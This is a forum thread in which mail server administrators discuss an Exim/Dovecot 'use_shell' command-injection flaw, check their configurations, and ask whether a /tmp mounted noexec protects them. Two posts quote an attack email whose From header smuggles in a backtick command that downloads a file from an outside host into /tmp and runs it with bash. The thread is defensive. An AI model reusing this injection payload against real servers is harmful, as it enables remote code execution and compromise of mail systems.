use_shell is insecure

Hello,

Is there a prove link for the issue you are referring to?

By the the way the link you gave says "This documentation is for Dovecot v1.x", so are you sure, the issue is actual for Dovecot 2.x?
 
I can't seem to find where Dovecot transport is called (at least not in exim.conf or dovecot.conf), where can I disable use_shell, just to be sure?
 
I've already seen a multiple tries on our servers trying to abuse the flaw.
But I am unsure if they were successful.
I can't seem to find anything suspicious in the /tmp folder or anything else suspicious in the processlist.

An example mail I have seen passing by:
Date: Sun, 5 May 2013 00:09:38 +0200 (CEST)
From: red`wget${IFS}-O${IFS}/tmp/p${IFS}it-haz.hu/ex.txt``bash${IFS}/tmp/p`team@example.com

Running
Exim 4.80.1
dovecot: 2.1.15
 
The use_shell parameter is not located in my config files. I assume we are safe as the default value of this setting is "false"?
 
I check the wget file , he need the /tmp but this is when the security setting is set , mounted with noexec at normaly than the perl cant exec the backdoor file

or ?
 
From: red`wget${IFS}-O${IFS}/tmp/p${IFS}it-haz.hu/ex.txt``bash${IFS}/tmp/p`team@example.com
I also got mail attempts like this, addressed to the postmaster email address.
We also got the /tmp secured.

I should be under the transport configuration "dovecot_deliver:" somewhere near this line:
Code:
/usr/libexec/dovecot/deliver
or
Code:
/usr/lib/dovecot/deliver
However, until now I haven't found this or the use_shell line.

Maybe DA support can tell us more?
 
Back
Top